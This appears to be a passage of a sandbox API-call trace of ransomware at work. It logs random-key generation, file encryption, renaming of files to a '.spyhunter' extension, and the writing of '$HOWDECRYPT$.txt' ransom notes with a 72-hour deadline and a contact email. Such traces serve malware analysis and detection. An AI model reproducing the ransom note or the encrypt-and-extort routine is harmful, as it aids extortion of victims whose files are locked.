CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2a8 | out: pbBuffer=0x57e2a8) returned 1 [0179.945] GetProcessHeap () returned 0x2c0000 [0179.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.945] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2a0*=0x30) returned 1 [0179.945] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.948] GetProcessHeap () returned 0x2c0000 [0179.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.949] GetProcessHeap () returned 0x2c0000 [0179.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65620 | out: hHeap=0x2c0000) returned 1 [0179.949] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2a0 | out: pbBuffer=0x57e2a0) returned 1 [0179.949] GetProcessHeap () returned 0x2c0000 [0179.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.949] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e298*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e298*=0x30) returned 1 [0179.949] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.951] GetProcessHeap () returned 0x2c0000 [0179.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.951] GetProcessHeap () returned 0x2c0000 [0179.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65540 | out: hHeap=0x2c0000) returned 1 [0179.951] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2a0 | out: pbBuffer=0x57e2a0) returned 1 [0179.951] GetProcessHeap () returned 0x2c0000 [0179.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.951] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e298*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e298*=0x30) returned 1 [0179.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.955] GetProcessHeap () returned 0x2c0000 [0179.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.955] GetProcessHeap () returned 0x2c0000 [0179.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65460 | out: hHeap=0x2c0000) returned 1 [0179.956] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e298 | out: pbBuffer=0x57e298) returned 1 [0179.956] GetProcessHeap () returned 0x2c0000 [0179.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.956] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e290*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e290*=0x30) returned 1 [0179.956] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.957] GetProcessHeap () returned 0x2c0000 [0179.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.957] GetProcessHeap () returned 0x2c0000 [0179.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65380 | out: hHeap=0x2c0000) returned 1 [0179.957] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e298 | out: pbBuffer=0x57e298) returned 1 [0179.958] GetProcessHeap () returned 0x2c0000 [0179.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.958] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e290*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e290*=0x30) returned 1 [0179.958] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.959] GetProcessHeap () returned 0x2c0000 [0179.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.959] GetProcessHeap () returned 0x2c0000 [0179.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e652a0 | out: hHeap=0x2c0000) returned 1 [0179.959] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e290 | out: pbBuffer=0x57e290) returned 1 [0179.959] GetProcessHeap () returned 0x2c0000 [0179.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.959] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e288*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e288*=0x30) returned 1 [0179.960] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.961] GetProcessHeap () returned 0x2c0000 [0179.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.961] GetProcessHeap () returned 0x2c0000 [0179.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e651c0 | out: hHeap=0x2c0000) returned 1 [0179.961] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e290 | out: pbBuffer=0x57e290) returned 1 [0179.961] GetProcessHeap () returned 0x2c0000 [0179.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.961] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e288*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e288*=0x30) returned 1 [0179.961] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.963] GetProcessHeap () returned 0x2c0000 [0179.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.963] GetProcessHeap () returned 0x2c0000 [0179.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e650e0 | out: hHeap=0x2c0000) returned 1 [0179.963] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e288 | out: pbBuffer=0x57e288) returned 1 [0179.963] GetProcessHeap () returned 0x2c0000 [0179.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.963] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e280*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e280*=0x30) returned 1 [0179.963] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.966] GetProcessHeap () returned 0x2c0000 [0179.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.966] GetProcessHeap () returned 0x2c0000 [0179.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65000 | out: hHeap=0x2c0000) returned 1 [0179.966] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e288 | out: pbBuffer=0x57e288) returned 1 [0179.966] GetProcessHeap () returned 0x2c0000 [0179.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.966] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e280*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e280*=0x30) returned 1 [0179.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.967] GetProcessHeap () returned 0x2c0000 [0179.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.967] GetProcessHeap () returned 0x2c0000 [0179.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64f20 | out: hHeap=0x2c0000) returned 1 [0179.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e280 | out: pbBuffer=0x57e280) returned 1 [0179.968] GetProcessHeap () returned 0x2c0000 [0179.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e278*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e278*=0x30) returned 1 [0179.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.977] GetProcessHeap () returned 0x2c0000 [0179.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.977] GetProcessHeap () returned 0x2c0000 [0179.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64e40 | out: hHeap=0x2c0000) returned 1 [0179.977] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e280 | out: pbBuffer=0x57e280) returned 1 [0179.977] GetProcessHeap () returned 0x2c0000 [0179.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.977] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e278*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e278*=0x30) returned 1 [0179.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.980] GetProcessHeap () returned 0x2c0000 [0179.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.980] GetProcessHeap () returned 0x2c0000 [0179.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e649e0 | out: hHeap=0x2c0000) returned 1 [0179.980] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e278 | out: pbBuffer=0x57e278) returned 1 [0179.980] GetProcessHeap () returned 0x2c0000 [0179.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e270*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e270*=0x30) returned 1 [0179.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.984] GetProcessHeap () returned 0x2c0000 [0179.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.984] GetProcessHeap () returned 0x2c0000 [0179.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64660 | out: hHeap=0x2c0000) returned 1 [0179.984] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e278 | out: pbBuffer=0x57e278) returned 1 [0179.984] GetProcessHeap () returned 0x2c0000 [0179.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.984] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e270*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e270*=0x30) returned 1 [0179.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.984] GetProcessHeap () returned 0x2c0000 [0179.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.984] GetProcessHeap () returned 0x2c0000 [0179.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e642e0 | out: hHeap=0x2c0000) returned 1 [0179.984] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e270 | out: pbBuffer=0x57e270) returned 1 [0179.984] GetProcessHeap () returned 0x2c0000 [0179.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.984] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e268*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e268*=0x30) returned 1 [0179.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.989] GetProcessHeap () returned 0x2c0000 [0179.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.989] GetProcessHeap () returned 0x2c0000 [0179.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64200 | out: hHeap=0x2c0000) returned 1 [0179.989] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e270 | out: pbBuffer=0x57e270) returned 1 [0179.989] GetProcessHeap () returned 0x2c0000 [0179.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.989] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e268*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e268*=0x30) returned 1 [0179.989] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.996] GetProcessHeap () returned 0x2c0000 [0179.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.996] GetProcessHeap () returned 0x2c0000 [0179.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63da0 | out: hHeap=0x2c0000) returned 1 [0179.996] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e268 | out: pbBuffer=0x57e268) returned 1 [0179.996] GetProcessHeap () returned 0x2c0000 [0179.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e260*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e260*=0x30) returned 1 [0179.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.998] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm") returned 56 [0179.998] StrStrW (lpFirst="Vigtigt.htm", lpSrch=".txt") returned 0x0 [0179.998] GetProcessHeap () returned 0x2c0000 [0179.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.998] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e224, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e224*=0x2800, lpOverlapped=0x0) returned 1 [0179.999] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.999] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e224, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e224*=0x2800, lpOverlapped=0x0) returned 1 [0179.999] GetProcessHeap () returned 0x2c0000 [0179.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.999] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.999] WriteFile (in: hFile=0xb0, lpBuffer=0x57e264*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e224, lpOverlapped=0x0 | out: lpBuffer=0x57e264*, lpNumberOfBytesWritten=0x57e224*=0x4, lpOverlapped=0x0) returned 1 [0180.000] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e224, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e224*=0x30, lpOverlapped=0x0) returned 1 [0180.000] CloseHandle (hObject=0xb0) returned 1 [0180.000] GetProcessHeap () returned 0x2c0000 [0180.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.000] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.spyhunter") returned 66 [0180.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm.spyhunter")) returned 1 [0180.002] GetProcessHeap () returned 0x2c0000 [0180.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.002] GetProcessHeap () returned 0x2c0000 [0180.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.002] GetProcessHeap () returned 0x2c0000 [0180.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f340 | out: hHeap=0x2c0000) returned 1 [0180.002] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.003] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0180.003] WriteFile (in: hFile=0xb0, lpBuffer=0x57e19b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e2c4, lpOverlapped=0x0 | out: lpBuffer=0x57e19b*, lpNumberOfBytesWritten=0x57e2c4*=0x127, lpOverlapped=0x0) returned 1 [0180.005] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0180.005] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e2c4*=0x2ac, lpOverlapped=0x0) returned 1 [0180.005] CloseHandle (hObject=0xb0) returned 1 [0180.005] GetProcessHeap () returned 0x2c0000 [0180.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63a20 | out: hHeap=0x2c0000) returned 1 [0180.005] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.007] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0180.007] WriteFile (in: hFile=0xb0, lpBuffer=0x57e197*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e2c0, lpOverlapped=0x0 | out: lpBuffer=0x57e197*, lpNumberOfBytesWritten=0x57e2c0*=0x127, lpOverlapped=0x0) returned 1 [0180.009] lstrlenA 